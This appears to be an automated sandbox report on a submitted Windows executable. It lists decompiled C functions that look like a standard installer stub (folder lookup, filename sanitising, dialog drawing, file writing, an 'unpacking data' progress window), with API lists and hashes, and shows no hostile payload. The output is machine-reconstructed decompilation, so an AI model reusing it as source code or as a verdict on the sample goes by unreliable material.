                                                  								E00405D1D(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                                  							}
                                                  							L41:
                                                  							_t40 = lstrlenA(_t86);
                                                  							_t74 = _a8;
                                                  							_t86 =  &(_t86[_t40]);
                                                  							_t37 = 0x422f20;
                                                  							continue;
                                                  						}
                                                  						__eflags = _t95 - 0x1d;
                                                  						if(_t95 != 0x1d) {
                                                  							__eflags = (_t95 << 0xa) + 0x425000;
                                                  							E00405CFB(_t86, (_t95 << 0xa) + 0x425000);
                                                  						} else {
                                                  							E00405C59(_t86,  *0x423f88);
                                                  						}
                                                  						__eflags = _t95 + 0xffffffeb - 7;
                                                  						if(_t95 + 0xffffffeb < 7) {
                                                  							L32:
                                                  							E00405F5D(_t86);
                                                  						}
                                                  						goto L41;
                                                  					}
                                                  					_t97 = 2;
                                                  					_t50 = GetVersion();
                                                  					__eflags = _t50;
                                                  					if(_t50 >= 0) {
                                                  						L12:
                                                  						_v8 = 1;
                                                  						L13:
                                                  						__eflags =  *0x424004;
                                                  						if( *0x424004 != 0) {
                                                  							_t97 = 4;
                                                  						}
                                                  						__eflags = _t69;
                                                  						if(_t69 >= 0) {
                                                  							__eflags = _t69 - 0x25;
                                                  							if(_t69 != 0x25) {
                                                  								__eflags = _t69 - 0x24;
                                                  								if(_t69 == 0x24) {
                                                  									GetWindowsDirectoryA(_t86, 0x400);
                                                  									_t97 = 0;
                                                  								}
                                                  								while(1) {
                                                  									__eflags = _t97;
                                                  									if(_t97 == 0) {
                                                  										goto L29;
                                                  									}
                                                  									_t51 =  *0x423f84;
                                                  									_t97 = _t97 - 1;
                                                  									__eflags = _t51;
                                                  									if(_t51 == 0) {
                                                  										L25:
                                                  										_t53 = SHGetSpecialFolderLocation( *0x423f88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                                  										__eflags = _t53;
                                                  										if(_t53 != 0) {
                                                  											L27:
                                                  											 *_t86 =  *_t86 & 0x00000000;
                                                  											__eflags =  *_t86;
                                                  											continue;
                                                  										}
                                                  										__imp__SHGetPathFromIDListA(_v12, _t86);
                                                  										__imp__CoTaskMemFree(_v12);
                                                  										__eflags = _t53;
                                                  										if(_t53 != 0) {
                                                  											goto L29;
                                                  										}
                                                  										goto L27;
                                                  									}
                                                  									__eflags = _v8;
                                                  									if(_v8 == 0) {
                                                  										goto L25;
                                                  									}
                                                  									_t55 =  *_t51( *0x423f88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
                                                  									__eflags = _t55;
                                                  									if(_t55 == 0) {
                                                  										goto L29;
                                                  									}
                                                  									goto L25;
                                                  								}
                                                  								goto L29;
                                                  							}
                                                  							GetSystemDirectoryA(_t86, 0x400);
                                                  							goto L29;
                                                  						} else {
                                                  							_t72 = (_t69 & 0x0000003f) +  *0x423fb8;
                                                  							E00405BE2(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423fb8, _t86, _t69 & 0x00000040);
                                                  							__eflags =  *_t86;
                                                  							if( *_t86 != 0) {
                                                  								L30:
                                                  								__eflags = _v16 - 0x1a;
                                                  								if(_v16 == 0x1a) {
                                                  									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                  								}
                                                  								goto L32;
                                                  							}
                                                  							E00405D1D(_t72, _t86, _t97, _t86, _v16);
                                                  							L29:
                                                  							__eflags =  *_t86;
                                                  							if( *_t86 == 0) {
                                                  								goto L32;
                                                  							}
                                                  							goto L30;
                                                  						}
                                                  					}
                                                  					__eflags = _t50 - 0x5a04;
                                                  					if(_t50 == 0x5a04) {
                                                  						goto L12;
                                                  					}
                                                  					__eflags = _v16 - 0x23;
                                                  					if(_v16 == 0x23) {
                                                  						goto L12;
                                                  					}
                                                  					__eflags = _v16 - 0x2e;
                                                  					if(_v16 == 0x2e) {
                                                  						goto L12;
                                                  					} else {
                                                  						_v8 = _v8 & 0x00000000;
                                                  						goto L13;
                                                  					}
                                                  				}
                                                  				 *_t86 =  *_t86 & 0x00000000;
                                                  				if(_a4 == 0) {
                                                  					return _t37;
                                                  				}
                                                  				return E00405CFB(_a4, _t37);
                                                  			}





























                                                  APIs
                                                  • GetVersion.KERNEL32(?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405DC5
                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405E40
                                                  • GetWindowsDirectoryA.KERNEL32(00422F20,00000400), ref: 00405E53
                                                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8F
                                                  • SHGetPathFromIDListA.SHELL32(00000000,00422F20), ref: 00405E9D
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00405EA8
                                                  • lstrcatA.KERNEL32(00422F20,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ECA
                                                  • lstrlenA.KERNEL32(00422F20,?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405F1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: /B$ /B$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 900638850-1912783298
                                                  • Opcode ID: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                                                  • Instruction ID: bc679195f81621fcb390d0e71ed0d7b45f11abfd0e51c03931a277fa57cc5d3e
                                                  • Opcode Fuzzy Hash: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                                                  • Instruction Fuzzy Hash: A051F471A04A02ABEB256F24DC847BB3B74DB55315F50823BE991B62D0D33C4A42DF8E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405F5D(CHAR* _a4) {
                                                  				char _t5;
                                                  				char _t7;
                                                  				char* _t15;
                                                  				char* _t16;
                                                  				CHAR* _t17;
                                                  
                                                  				_t17 = _a4;
                                                  				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                  					_t17 =  &(_t17[4]);
                                                  				}
                                                  				if( *_t17 != 0 && E0040585B(_t17) != 0) {
                                                  					_t17 =  &(_t17[2]);
                                                  				}
                                                  				_t5 =  *_t17;
                                                  				_t15 = _t17;
                                                  				_t16 = _t17;
                                                  				if(_t5 != 0) {
                                                  					do {
                                                  						if(_t5 > 0x1f &&  *((char*)(E00405819("*?|<>/\":", _t5))) == 0) {
                                                  							E00405993(_t16, _t17, CharNextA(_t17) - _t17);
                                                  							_t16 = CharNextA(_t16);
                                                  						}
                                                  						_t17 = CharNextA(_t17);
                                                  						_t5 =  *_t17;
                                                  					} while (_t5 != 0);
                                                  				}
                                                  				 *_t16 =  *_t16 & 0x00000000;
                                                  				while(1) {
                                                  					_t16 = CharPrevA(_t15, _t16);
                                                  					_t7 =  *_t16;
                                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                  						break;
                                                  					}
                                                  					 *_t16 =  *_t16 & 0x00000000;
                                                  					if(_t15 < _t16) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				return _t7;
                                                  			}









                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                                                  • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\Lc8xQv8iZY.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-3208037814
                                                  • Opcode ID: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                                                  • Instruction ID: afd4a01125e034af7a3871a1a8bdb924777211b2e54028c3170dd0334d944cbd
                                                  • Opcode Fuzzy Hash: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                                                  • Instruction Fuzzy Hash: 7111B251808B962DEB3216384C44B777F9DCB967A0F5844BBE9C5722C2C67C9C438B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040401E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                  				struct tagLOGBRUSH _v16;
                                                  				long _t35;
                                                  				long _t37;
                                                  				void* _t40;
                                                  				long* _t49;
                                                  
                                                  				if(_a4 + 0xfffffecd > 5) {
                                                  					L15:
                                                  					return 0;
                                                  				}
                                                  				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                  				if(_t49 == 0) {
                                                  					goto L15;
                                                  				}
                                                  				_t35 =  *_t49;
                                                  				if((_t49[5] & 0x00000002) != 0) {
                                                  					_t35 = GetSysColor(_t35);
                                                  				}
                                                  				if((_t49[5] & 0x00000001) != 0) {
                                                  					SetTextColor(_a8, _t35);
                                                  				}
                                                  				SetBkMode(_a8, _t49[4]);
                                                  				_t37 = _t49[1];
                                                  				_v16.lbColor = _t37;
                                                  				if((_t49[5] & 0x00000008) != 0) {
                                                  					_t37 = GetSysColor(_t37);
                                                  					_v16.lbColor = _t37;
                                                  				}
                                                  				if((_t49[5] & 0x00000004) != 0) {
                                                  					SetBkColor(_a8, _t37);
                                                  				}
                                                  				if((_t49[5] & 0x00000010) != 0) {
                                                  					_v16.lbStyle = _t49[2];
                                                  					_t40 = _t49[3];
                                                  					if(_t40 != 0) {
                                                  						DeleteObject(_t40);
                                                  					}
                                                  					_t49[3] = CreateBrushIndirect( &_v16);
                                                  				}
                                                  				return _t49[3];
                                                  			}









                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                                  • Instruction ID: 6c3acea846b2bea6830d2fc4e13120c874811c96ebe523463579326edd4eeab8
                                                  • Opcode Fuzzy Hash: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                                  • Instruction Fuzzy Hash: AC2184B1904704ABC7319F78DD08B4B7BF8AF41714F048629EA95F22E0C734E904CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E00402692(struct _OVERLAPPED* __ebx) {
                                                  				void* _t27;
                                                  				long _t32;
                                                  				struct _OVERLAPPED* _t47;
                                                  				void* _t51;
                                                  				void* _t53;
                                                  				void* _t56;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  
                                                  				_t47 = __ebx;
                                                  				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
                                                  				_t52 = E00402A0C(0xfffffff0);
                                                  				 *(_t58 - 0x38) = _t24;
                                                  				if(E0040585B(_t52) == 0) {
                                                  					E00402A0C(0xffffffed);
                                                  				}
                                                  				E004059B3(_t52);
                                                  				_t27 = E004059D2(_t52, 0x40000000, 2);
                                                  				 *(_t58 + 8) = _t27;
                                                  				if(_t27 != 0xffffffff) {
                                                  					_t32 =  *0x423f94;
                                                  					 *(_t58 - 0x30) = _t32;
                                                  					_t51 = GlobalAlloc(0x40, _t32);
                                                  					if(_t51 != _t47) {
                                                  						E00403207(_t47);
                                                  						E004031D5(_t51,  *(_t58 - 0x30));
                                                  						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
                                                  						 *(_t58 - 0x34) = _t56;
                                                  						if(_t56 != _t47) {
                                                  							E00402F2E(_t49,  *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
                                                  							while( *_t56 != _t47) {
                                                  								_t49 =  *_t56;
                                                  								_t57 = _t56 + 8;
                                                  								 *(_t58 - 0x48) =  *_t56;
                                                  								E00405993( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                  								_t56 = _t57 +  *(_t58 - 0x48);
                                                  							}
                                                  							GlobalFree( *(_t58 - 0x34));
                                                  						}
                                                  						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
                                                  						GlobalFree(_t51);
                                                  						 *((intOrPtr*)(_t58 - 0xc)) = E00402F2E(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                  					}
                                                  					CloseHandle( *(_t58 + 8));
                                                  				}
                                                  				_t53 = 0xfffffff3;
                                                  				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
                                                  					_t53 = 0xffffffef;
                                                  					DeleteFileA( *(_t58 - 0x38));
                                                  					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                  				}
                                                  				_push(_t53);
                                                  				E00401423();
                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t58 - 4));
                                                  				return 0;
                                                  			}












                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004026E6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402702
                                                  • GlobalFree.KERNEL32 ref: 0040273B
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040274D
                                                  • GlobalFree.KERNEL32 ref: 00402754
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040276C
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402780
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                                                  • Instruction ID: 9ca97f70dd32fe41b4909f681106d09eb720980563b4c140891508526f153775
                                                  • Opcode Fuzzy Hash: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                                                  • Instruction Fuzzy Hash: 2331AD71C00028BBDF216FA5DE88DAE7E79EF05364F10023AF920762E1C77919409F99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404FE7(CHAR* _a4, CHAR* _a8) {
                                                  				struct HWND__* _v8;
                                                  				signed int _v12;
                                                  				CHAR* _v32;
                                                  				long _v44;
                                                  				int _v48;
                                                  				void* _v52;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				CHAR* _t26;
                                                  				signed int _t27;
                                                  				CHAR* _t28;
                                                  				long _t29;
                                                  				signed int _t39;
                                                  
                                                  				_t26 =  *0x423764;
                                                  				_v8 = _t26;
                                                  				if(_t26 != 0) {
                                                  					_t27 =  *0x424034;
                                                  					_v12 = _t27;
                                                  					_t39 = _t27 & 0x00000001;
                                                  					if(_t39 == 0) {
                                                  						E00405D1D(0, _t39, 0x41fd58, 0x41fd58, _a4);
                                                  					}
                                                  					_t26 = lstrlenA(0x41fd58);
                                                  					_a4 = _t26;
                                                  					if(_a8 == 0) {
                                                  						L6:
                                                  						if((_v12 & 0x00000004) == 0) {
                                                  							_t26 = SetWindowTextA( *0x423748, 0x41fd58);
                                                  						}
                                                  						if((_v12 & 0x00000002) == 0) {
                                                  							_v32 = 0x41fd58;
                                                  							_v52 = 1;
                                                  							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                  							_v44 = 0;
                                                  							_v48 = _t29 - _t39;
                                                  							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                  							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                  						}
                                                  						if(_t39 != 0) {
                                                  							_t28 = _a4;
                                                  							 *((char*)(_t28 + 0x41fd58)) = 0;
                                                  							return _t28;
                                                  						}
                                                  					} else {
                                                  						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                  						if(_t26 < 0x800) {
                                                  							_t26 = lstrcatA(0x41fd58, _a8);
                                                  							goto L6;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t26;
                                                  			}


















                                                  APIs
                                                  • lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                  • lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                  • lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                  • SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                                                  • Instruction ID: e3991c5cb709e07264e8487875a2ca594626b649f9c95e4975d9101e96294db0
                                                  • Opcode Fuzzy Hash: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                                                  • Instruction Fuzzy Hash: 0A21AC71900508BBDF11AFA4CC849DFBFB9EF44354F10803AF504B62A0C2398E808FA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00402BE9(intOrPtr _a4) {
                                                  				char _v68;
                                                  				long _t6;
                                                  				struct HWND__* _t7;
                                                  				struct HWND__* _t15;
                                                  
                                                  				if(_a4 != 0) {
                                                  					_t15 =  *0x41712c; // 0x0
                                                  					if(_t15 != 0) {
                                                  						_t15 = DestroyWindow(_t15);
                                                  					}
                                                  					 *0x41712c = 0;
                                                  					return _t15;
                                                  				}
                                                  				__eflags =  *0x41712c; // 0x0
                                                  				if(__eflags != 0) {
                                                  					return E004060C3(0);
                                                  				}
                                                  				_t6 = GetTickCount();
                                                  				__eflags = _t6 -  *0x423f8c;
                                                  				if(_t6 >  *0x423f8c) {
                                                  					__eflags =  *0x423f88;
                                                  					if( *0x423f88 == 0) {
                                                  						_t7 = CreateDialogParamA( *0x423f80, 0x6f, 0, E00402B51, 0);
                                                  						 *0x41712c = _t7;
                                                  						return ShowWindow(_t7, 5);
                                                  					}
                                                  					__eflags =  *0x424034 & 0x00000001;
                                                  					if(( *0x424034 & 0x00000001) != 0) {
                                                  						wsprintfA( &_v68, "... %d%%", E00402BCD());
                                                  						return E00404FE7(0,  &_v68);
                                                  					}
                                                  				}
                                                  				return _t6;
                                                  			}








                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402C01
                                                  • GetTickCount.KERNEL32 ref: 00402C1F
                                                  • wsprintfA.USER32 ref: 00402C4D
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B51,00000000), ref: 00402C71
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C7F
                                                    • Part of subcall function 00402BCD: MulDiv.KERNEL32(000199ED,00000064,?), ref: 00402BE2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                                                  • Instruction ID: c64e3f0d3b0757b6abccf377c05ef7dd5a4a2d15633f5d7fd60a106f882d1610
                                                  • Opcode Fuzzy Hash: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                                                  • Instruction Fuzzy Hash: F701CC30909215A7E7216FA0AF4DE9E7778A709701750803BFA01B11D0D2F855458BAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004048B6(struct HWND__* _a4, intOrPtr _a8) {
                                                  				long _v8;
                                                  				signed char _v12;
                                                  				unsigned int _v16;
                                                  				void* _v20;
                                                  				intOrPtr _v24;
                                                  				long _v56;
                                                  				void* _v60;
                                                  				long _t15;
                                                  				unsigned int _t19;
                                                  				signed int _t25;
                                                  				struct HWND__* _t28;
                                                  
                                                  				_t28 = _a4;
                                                  				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                  				if(_a8 == 0) {
                                                  					L4:
                                                  					_v56 = _t15;
                                                  					_v60 = 4;
                                                  					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                  					return _v24;
                                                  				}
                                                  				_t19 = GetMessagePos();
                                                  				_v16 = _t19 >> 0x10;
                                                  				_v20 = _t19;
                                                  				ScreenToClient(_t28,  &_v20);
                                                  				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                  				if((_v12 & 0x00000066) != 0) {
                                                  					_t15 = _v8;
                                                  					goto L4;
                                                  				}
                                                  				return _t25 | 0xffffffff;
                                                  			}















                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048D1
                                                  • GetMessagePos.USER32 ref: 004048D9
                                                  • ScreenToClient.USER32 ref: 004048F3
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404905
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040492B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                                  • Instruction ID: 15d2046a7114e84a1294b603ac72faee52eeac06783d2b716c70649c054a36c5
                                                  • Opcode Fuzzy Hash: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                                  • Instruction Fuzzy Hash: B0014071D00219BADB00DBA4DC45BFFBBBCAB99711F10412ABB10B62D0D7B465018BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00402B51(struct HWND__* _a4, intOrPtr _a8) {
                                                  				char _v68;
                                                  				void* _t11;
                                                  				CHAR* _t19;
                                                  
                                                  				if(_a8 == 0x110) {
                                                  					SetTimer(_a4, 1, 0xfa, 0);
                                                  					_a8 = 0x113;
                                                  				}
                                                  				if(_a8 == 0x113) {
                                                  					_t11 = E00402BCD();
                                                  					_t19 = "unpacking data: %d%%";
                                                  					if( *0x423f90 == 0) {
                                                  						_t19 = "verifying installer: %d%%";
                                                  					}
                                                  					wsprintfA( &_v68, _t19, _t11);
                                                  					SetWindowTextA(_a4,  &_v68);
                                                  					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                  				}
                                                  				return 0;
                                                  			}







                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B6C
                                                  • wsprintfA.USER32 ref: 00402BA0
                                                  • SetWindowTextA.USER32(?,?), ref: 00402BB0
                                                  • SetDlgItemTextA.USER32 ref: 00402BC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
